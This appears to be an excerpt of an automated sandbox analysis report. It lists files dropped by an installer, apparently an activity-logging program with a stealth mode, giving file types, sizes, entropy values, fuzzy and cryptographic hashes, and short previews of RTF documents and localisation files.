                                                                                                                                                                                                                                                          Preview:{\rtf1\ansi\deff3\adeflang1025.{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset128 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset128 Liberation Sans{\*\falt Arial};}{\f5\froman\fprq0\fcharset128 Tahoma;}{\f6\froman\fprq2\fcharset128 Arial;}{\f7\froman\fprq0\fcharset128 Arial;}{\f8\fnil\fprq2\fcharset128 WenQuanYi Micro Hei;}{\f9\fnil\fprq2\fcharset128 Lohit Hindi;}{\f10\fnil\fprq0\fcharset128 Lohit Hindi;}{\f11\fnil\fprq0\fcharset128 Times New Roman;}{\f12\fnil\fprq0\fcharset128 Courier New Baltic;}{\f13\fnil\fprq2\fcharset128 Arial;}{\f14\fnil\fprq0\fcharset128 Arial;}}.{\colortbl;\red0\green0\blue0;\red128\green128\blue128;}.{\stylesheet{\s0\snext0\nowidctlpar{\*\hyphen2\hyphlead2\hyphtrail2\hyphmax0}\cf0\kerning1\hich\af8\langfe2052\dbch\af9\afs24\alang1081\loch\f3\fs24\lang1040 Predefinito;}.{\s2\sbasedon15\snext16\ilvl1\outlinelevel1\ql\widctlpar\faauto\li0
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):17786
                                                                                                                                                                                                                                                          Entropy (8bit):4.892369802650086
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:TQ5h222K2a2O2G2y2E2+2L6z+CSD6E+fSE6O+YSY6z+CSD6E+fSE6O+YSS6z6C6w:TQ5h7HvTrbVLWsXixqh/1JsXixqh/1X+
                                                                                                                                                                                                                                                          MD5:B7BE54FA07192D11B0624600C99D449E
                                                                                                                                                                                                                                                          SHA1:372509E74C98F5BAE5A50088B4AA1B18711C834F
                                                                                                                                                                                                                                                          SHA-256:0F599243F6282C72AAC90EEF278B4F7BD5B78161508E494ABAC24E719702DDDB
                                                                                                                                                                                                                                                          SHA-512:20C131AE058B058F60D97E21D7E49BAB6FEC975229AFF7302F6559975CEA91F81130F8D1C15E7200A53A61AFB935FE7B3D608838AA0190A42D09D02C168CFE1C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\ansi\deff3\adeflang1025.{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset128 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset128 Liberation Sans{\*\falt Arial};}{\f5\froman\fprq0\fcharset128 Calibri;}{\f6\froman\fprq2\fcharset128 Arial;}{\f7\froman\fprq0\fcharset128 Arial;}{\f8\froman\fprq2\fcharset128 Calibri;}{\f9\fnil\fprq2\fcharset128 WenQuanYi Micro Hei;}{\f10\fnil\fprq2\fcharset128 Lohit Hindi;}{\f11\fnil\fprq0\fcharset128 Lohit Hindi;}{\f12\fnil\fprq0\fcharset128 Times New Roman;}{\f13\fnil\fprq2\fcharset128 Arial;}{\f14\fnil\fprq0\fcharset128 Arial;}}.{\colortbl;\red0\green0\blue0;\red255\green0\blue0;\red0\green32\blue96;\red35\green0\blue220;\red0\green69\blue134;\red128\green128\blue128;}.{\stylesheet{\s0\snext0\nowidctlpar{\*\hyphen2\hyphlead2\hyphtrail2\hyphmax0}\cf0\kerning1\hich\af9\langfe2052\dbch\af10\afs24\alang1081\loch\f3\fs24\lang1040 Pr
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):7884
                                                                                                                                                                                                                                                          Entropy (8bit):4.965317939103163
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:zersYRcg17pzo2uz1FwLcxwSwbzUPhjNAqecUAySMnuturWGi:ZYf7doz1FwLcxwSwnUPhxAqecUAyLuIA
                                                                                                                                                                                                                                                          MD5:83F331C3191915043D3C1F96D04AD2AA
                                                                                                                                                                                                                                                          SHA1:1F5A281457AD229178ADFE68E6ED3C407DD15BA5
                                                                                                                                                                                                                                                          SHA-256:864E70E0CBF1CBB5EF7B65EC5A90D617D299A0C896E17EA6C973BF5D0F44ADA0
                                                                                                                                                                                                                                                          SHA-512:C047F469B1A5BF82D88443D33B1B26AA30B4CB1E5C8A515119B5D62B3D98C4761830761D0813994DAA9BDE86BB7F73ABF47ADDE25A74D6FCEA05D5F0E0E779B6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\ansi\deff3\adeflang1025.{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset128 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset128 Liberation Sans{\*\falt Arial};}{\f5\froman\fprq2\fcharset128 Arial;}{\f6\froman\fprq0\fcharset128 Arial;}{\f7\froman\fprq2\fcharset128 Times New Roman;}{\f8\froman\fprq0\fcharset128 Times New Roman;}{\f9\fnil\fprq2\fcharset128 WenQuanYi Micro Hei;}{\f10\fnil\fprq2\fcharset128 Lohit Hindi;}{\f11\fnil\fprq0\fcharset128 Lohit Hindi;}{\f12\fnil\fprq2\fcharset128 Arial;}{\f13\fnil\fprq0\fcharset128 Arial;}}.{\colortbl;\red0\green0\blue0;\red128\green128\blue128;}.{\stylesheet{\s0\snext0\nowidctlpar{\*\hyphen2\hyphlead2\hyphtrail2\hyphmax0}\cf0\kerning1\hich\af9\langfe2052\dbch\af10\afs24\alang1081\loch\f3\fs24\lang1040 Predefinito;}.{\s15\sbasedon0\snext16\sb240\sa120\keepn\hich\af9\dbch\af10\afs28\loch\f4\fs28 Intestazione;}.{\s16\sba
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):10281
                                                                                                                                                                                                                                                          Entropy (8bit):4.953685836066729
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:6L1GSkFI222K2a2O2G2y2E2+2L6z6C6D6E6f6E6O6Y6Y9jn9js9j39jX9jR9jp9S:0sFI222K2a2O2G2y2E2+2L6z6C6D6E6Z
                                                                                                                                                                                                                                                          MD5:8D669B205AF7D1401C340D474FADE116
                                                                                                                                                                                                                                                          SHA1:C61F519EF768F519E93F456D61FCEFE93EF1A058
                                                                                                                                                                                                                                                          SHA-256:2B01786D3BA405BAA36920EF092701AF28CEA08F56507D4DE9717D47474C3B65
                                                                                                                                                                                                                                                          SHA-512:0697175789BE81C29F0FBB5DD815FB46B553A6D241D8936C0E29F95D23651A2B730A893B98C90F6F3494B93FF0144F05DE95DB24D089EC01084C0FC8E36B3F70
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\ansi\deff3\adeflang1025.{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset128 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset128 Liberation Sans{\*\falt Arial};}{\f5\fswiss\fprq0\fcharset128 Calibri;}{\f6\froman\fprq0\fcharset128 Tahoma;}{\f7\froman\fprq0\fcharset128 Calibri;}{\f8\froman\fprq2\fcharset128 Arial;}{\f9\froman\fprq0\fcharset128 Arial;}{\f10\fnil\fprq2\fcharset128 WenQuanYi Micro Hei;}{\f11\fnil\fprq2\fcharset128 Lohit Hindi;}{\f12\fnil\fprq0\fcharset128 Lohit Hindi;}{\f13\fnil\fprq0\fcharset128 Times New Roman;}{\f14\fnil\fprq0\fcharset128 Courier New Baltic;}{\f15\fnil\fprq2\fcharset128 Arial;}{\f16\fnil\fprq0\fcharset128 Arial;}}.{\colortbl;\red0\green0\blue0;\red128\green128\blue128;}.{\stylesheet{\s0\snext0\nowidctlpar{\*\hyphen2\hyphlead2\hyphtrail2\hyphmax0}\cf0\kerning1\hich\af10\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang1040
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):9031
                                                                                                                                                                                                                                                          Entropy (8bit):4.942487008032181
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:6L1GSkFI222K2a2O2G2y2E2+2L6z6C6D6E6f6E6O6Y6Y9jn9js9j39jX9jR9jp9v:0sFI222K2a2O2G2y2E2+2L6z6C6D6E6Q
                                                                                                                                                                                                                                                          MD5:140A646744F5CA2B77DC3CCAB81BE3E9
                                                                                                                                                                                                                                                          SHA1:57D15787E167C9284D0A57DE074749A8A10D6267
                                                                                                                                                                                                                                                          SHA-256:FACA864E826FC4333E1C6D8726C97446A824856214E302B154757A0071BB0666
                                                                                                                                                                                                                                                          SHA-512:F00406EA7C8EDA722707892A86C72A1331F1DEB007A78F34CC27A3B6175D3737AF9DA542F926313644B1CF0D8BAE087529196DBEEC4C7AE6EA3BCD5CE42D0F0F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\ansi\deff3\adeflang1025.{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset128 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset128 Liberation Sans{\*\falt Arial};}{\f5\fswiss\fprq0\fcharset128 Calibri;}{\f6\froman\fprq0\fcharset128 Tahoma;}{\f7\froman\fprq0\fcharset128 Calibri;}{\f8\froman\fprq2\fcharset128 Arial;}{\f9\froman\fprq0\fcharset128 Arial;}{\f10\fnil\fprq2\fcharset128 WenQuanYi Micro Hei;}{\f11\fnil\fprq2\fcharset128 Lohit Hindi;}{\f12\fnil\fprq0\fcharset128 Lohit Hindi;}{\f13\fnil\fprq0\fcharset128 Times New Roman;}{\f14\fnil\fprq0\fcharset128 Courier New Baltic;}{\f15\fnil\fprq2\fcharset128 Arial;}{\f16\fnil\fprq0\fcharset128 Arial;}}.{\colortbl;\red0\green0\blue0;\red128\green128\blue128;}.{\stylesheet{\s0\snext0\nowidctlpar{\*\hyphen2\hyphlead2\hyphtrail2\hyphmax0}\cf0\kerning1\hich\af10\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang1040
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):10229
                                                                                                                                                                                                                                                          Entropy (8bit):4.949701462728225
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:6L1GSkFI222K2a2O2G2y2E2+2L6z6C6D6E6f6E6O6Y6Y9jn9js9j39jX9jR9jp9z:0sFI222K2a2O2G2y2E2+2L6z6C6D6E6o
                                                                                                                                                                                                                                                          MD5:328B6D1A72880E42399A6A9FAAE89707
                                                                                                                                                                                                                                                          SHA1:B90F232CBADDD083D3E72EED57B362DBB5BB6B89
                                                                                                                                                                                                                                                          SHA-256:731252A5DD9F5F1D6BAF95F06B86795064735EF2EDB2A7B0A0400535B28FB1C2
                                                                                                                                                                                                                                                          SHA-512:70D96DB14DF3EA083AF7512998DBD565CD5DDEFDA0CB61A3378B9563642CB5FACD4D80A70763A454BE7B7BF4AA28A60C9B31AF7916066C9E56C5DB1A6F3D93D8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\ansi\deff3\adeflang1025.{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset128 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset128 Liberation Sans{\*\falt Arial};}{\f5\fswiss\fprq0\fcharset128 Calibri;}{\f6\froman\fprq0\fcharset128 Tahoma;}{\f7\froman\fprq0\fcharset128 Calibri;}{\f8\froman\fprq2\fcharset128 Arial;}{\f9\froman\fprq0\fcharset128 Arial;}{\f10\fnil\fprq2\fcharset128 WenQuanYi Micro Hei;}{\f11\fnil\fprq2\fcharset128 Lohit Hindi;}{\f12\fnil\fprq0\fcharset128 Lohit Hindi;}{\f13\fnil\fprq0\fcharset128 Times New Roman;}{\f14\fnil\fprq0\fcharset128 Courier New Baltic;}{\f15\fnil\fprq2\fcharset128 Arial;}{\f16\fnil\fprq0\fcharset128 Arial;}}.{\colortbl;\red0\green0\blue0;\red128\green128\blue128;}.{\stylesheet{\s0\snext0\nowidctlpar{\*\hyphen2\hyphlead2\hyphtrail2\hyphmax0}\cf0\kerning1\hich\af10\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang1040
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):40044
                                                                                                                                                                                                                                                          Entropy (8bit):5.023249387110861
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2rF4DO6xByF3LSVj1BgpGk1WhhIHRYRv0lsSTz3BAbZ/6A9u:2raDlZIA9u
                                                                                                                                                                                                                                                          MD5:994EC92B482BB93D1038B2F931B60AA4
                                                                                                                                                                                                                                                          SHA1:130934CF53D1215C4955232421AB44C7CCD1F95B
                                                                                                                                                                                                                                                          SHA-256:9A48D1986A44E9021CE072DE9A9D542357048ABBE6807E4CA151661708969D3C
                                                                                                                                                                                                                                                          SHA-512:5F2424B1B38FC0939FDCF6C29A72067174CB49FC4F97C6CE284570984047B4D5CFBDBB84D63F619DF24B8EAF070FAC3EE71858CD7D9536F5C7920A0AACA895E1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f39\fbidi \froman\fcharset128\fprq2{\*\panose 00000000000000000000}Liberation Serif{\*\falt Times New Roman};}..{\f40\fbidi \fswiss\fcharset128\fprq2{\*\panose 00000000000000000000}Liberation Sans{\*\falt Arial};}{\f41\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000}WenQuanYi Micro Hei{\*\falt MS Mincho};}..{\f42\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000}Lohit Hindi{\*\falt MS Mincho};}{\f315\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000}@WenQuanYi Micro Hei;}..{\f316\fbidi \froman\fcharset128\fprq2{\*\panose 0
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):20198
                                                                                                                                                                                                                                                          Entropy (8bit):5.546409615191028
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:UZbTxZJZoqbCXEgYNOZFnXzLlWQIrNacguCX:UBsFXz5W1NaOCX
                                                                                                                                                                                                                                                          MD5:CBEC3F081899B6B55B280D8F3DD4B3D2
                                                                                                                                                                                                                                                          SHA1:F340F12DD49A6F6D2E20999788430A6951E7950B
                                                                                                                                                                                                                                                          SHA-256:95C2CF8B3687D4EE57D51E982684660264A443D0AE516F6144728AC0C77FFCE4
                                                                                                                                                                                                                                                          SHA-512:F4C7027A5BEDBC2F6E44DA52F59B35FAC8A3657DB9796F9B8BE4B660D25083544597ED525EEADD2B9373325E3E6FD83BD9736BAA8E50187F5F8CCFF989D6A140
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.[LngFile]..###############################################################################..####### Attention! Do Not change the key phrases left of sign "="! ############..###############################################################################..tbStart="...."..tbStartHint=".........."..tbStop="...."..tbStopHint=".........."..tbFind="...."..tbFindHint="........."..tbSetting=".."..tbSettingHint="........"..tbAbout="...."..tbAboutHint=".... /...."..tbHomePage="......"..tbHomePageHint="................"..tbToday=".."..tbTodayHint="........"..tbHide=".."..tbHideHint="....... (..................)"..tbMinimize="....."..tbMinimizeHint="........."..tbExit=".."..tbExitHint=".........."..gbLog=
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):17281
                                                                                                                                                                                                                                                          Entropy (8bit):5.761139641515786
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:fA4WN9lOQy166uXz7tw7ROcW70cfgjqiK3xuaMV4Q:fAfy1LuntiROcWLNuaMVt
                                                                                                                                                                                                                                                          MD5:BAF8BBC333EA4877FF98E6EC0437E18F
                                                                                                                                                                                                                                                          SHA1:43FE338508BA6B1E59B5B0D21A641DEB4F887F82
                                                                                                                                                                                                                                                          SHA-256:32CAC64ABA0B7BEC0C48D76CE6D6C3695E241173CAD408C4F2F220CB5AE6A87B
                                                                                                                                                                                                                                                          SHA-512:5E2ED8A0DF57200E7FD2FF5F1F21041A3800AE92C66B550B91116D0E50685C3602467C738601D071049B1D3E74ED92DB2DAE5CE6D33F9776F8C2F62AA2E36C1E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[LngFile]..###############################################################################..####### Attention! Do Not change the key phrases left of sign "="! ############..###############################################################################..tbStart=".."..tbStartHint=".. .."..tbStop=".."..tbStopHint=".. ...."..tbFind=".."..tbFindHint=".. .. .."..tbSetting=".."..tbSettingHint=".... .."..tbAbout=".."..tbAboutHint=".. / .. .."..tbHomePage="...."..tbHomePageHint=".... ..... .."..tbToday=".."..tbTodayHint=".. ... .."..tbHide=".."..tbHideHint="... .. (... .... ... .. ..)"..tbMinimize="..."..tbMinimizeHint=".... ..."..tbExit=".."..tbExitHint=".... .. .."..gbLog="... .."..tCurrLogSize=".. .. (Mb)"..tCurrScrSize=".... .. (Mb)"..tCurrSnpSize=".. .
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):19350
                                                                                                                                                                                                                                                          Entropy (8bit):4.977328299832863
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:UfZj6oFtyWJJJuou35vzX6FcNnAy9+1C9ou8drw+MjKcEdQAi2jC+WUH:UfZj6oFtyWXRybX6Ad4C9q+pEdbvXx
                                                                                                                                                                                                                                                          MD5:05104FA93BC4180DCD6752F77382F263
                                                                                                                                                                                                                                                          SHA1:2A83710D4B63BF666D681D3F5E9C21324EB2581C
                                                                                                                                                                                                                                                          SHA-256:A2150D0BBC660122C1C183FCA420CFAAE7539956F20BA135DEC4655B3B212A6E
                                                                                                                                                                                                                                                          SHA-512:54ACDEAB94D389256C90FFB31934AE0182D7CB4F644CA671EE5F9599697357244B7F2F9CEA33D3CBE70463615389BF02E148818F99E9513DAF9A4D44B05913CD
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.[LngFile]..###############################################################################..####### Attention! Do Not change the key phrases left of sign "="! ############..###############################################################################..tbStart="In.cio"..tbStartHint="Habilitar registro"..tbStop="Parar"..tbStopHint="Desabilitar registro"..tbFind="Buscar"..tbFindHint="Procurar por informa..o de registro"..tbSetting="Configura..es"..tbSettingHint=" Configura..es de programa"..tbAbout="Sobre"..tbAboutHint="Sobre / informa..es de registro"..tbHomePage="P.gina Inicial"..tbHomePageHint="Ir para a P.gina Inicial do Programa"..tbToday="Hoje"..tbTodayHint="Ir para o registro de hoje"..tbHide="Ocultar"..tbHideHint="Modo Furtivo (nenhum .cone na Bandeja do Sistema)"..tbMinimize="Minimizar"..tbMinimizeHint="Minimizar Bandeja"..tbExit="Sair"..tbExitHint="Sair e parar o registro"..gbLog="Registro de Eventos"..tCurrLogSize="Tamanho do Log - Registro (Mb)"..tCurrScrSize=
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):47337
                                                                                                                                                                                                                                                          Entropy (8bit):5.026858098463381
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:xaOfIRjZyPCtqICnfLBOHjiqlO8DTO+6X9MsHEW71vUGF87etnC+zc7R+ezr21gQ:xapnVMNkfS
                                                                                                                                                                                                                                                          MD5:F4E08AB548997A7569D407BF6945FF93
                                                                                                                                                                                                                                                          SHA1:374C962B0AD68A101B3DAED59995A904FD2366DF
                                                                                                                                                                                                                                                          SHA-256:5F43BA173258F401DEBA2C385FC136464F11F0BF9C9122D5CB1EDDBBA356D24F
                                                                                                                                                                                                                                                          SHA-512:9F6F81663CCC54ED4B6E57770247EBDE16327C46ACFE14EF01BC3CF1172D9647AFDBED40FA59115DD41BA746428368A34C4307AA4D7B0093C88D86F8C4BAA982
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe2052\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fcharset2
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):40154
                                                                                                                                                                                                                                                          Entropy (8bit):5.0200796695222865
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:xoOfYRjCjOcPI0QhhiLVjLqPQcCTjwC9UqUkVuss8HD43p8ZHHuJf5:xobLUntNkf5
                                                                                                                                                                                                                                                          MD5:8360940E8A2388A3DE31148F9ED5DCBF
                                                                                                                                                                                                                                                          SHA1:6B44DF438877025970E59C226D3F3D347CCDC264
                                                                                                                                                                                                                                                          SHA-256:AE905D395961C89647DF96F870FB8BFB199D72FF40BD62C6B95413C06CC03927
                                                                                                                                                                                                                                                          SHA-512:1E58457C3359EEED8C187A5F60C09D6CFEAA3A995BE0FD3F22690A02383DF9DEFE5B60EFA1BF8B4FC0975B17683629292D3118DF670C4CBF1DF3141B73D4ACF5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe2052\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 0202060305040502030
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):41900
                                                                                                                                                                                                                                                          Entropy (8bit):5.016535633453485
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:xoOfYRj7jOcPI0QhhiLV6qiTqP7Mi6uxPwjmkoASoGpngl4ZbbsVj72Q/za1CkCI:xobqUncV/QNkf8
                                                                                                                                                                                                                                                          MD5:4610A71940E165CB27249C3133800D76
                                                                                                                                                                                                                                                          SHA1:395941C9ECEE674429A1108075F9DD0A241CF28B
                                                                                                                                                                                                                                                          SHA-256:AAE092EC9F04F37A0059D595A581A9818DB18A4247B95F237E20EED5571BC843
                                                                                                                                                                                                                                                          SHA-512:D297B3B4AEA83E3107A0C799A238C40060BBF7247DEFEF0E179A2F61ADF06442BFC90577C705CAB0D3D2D0D12BD3C86F56C0B5ED971087C47A1973B54853DE32
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
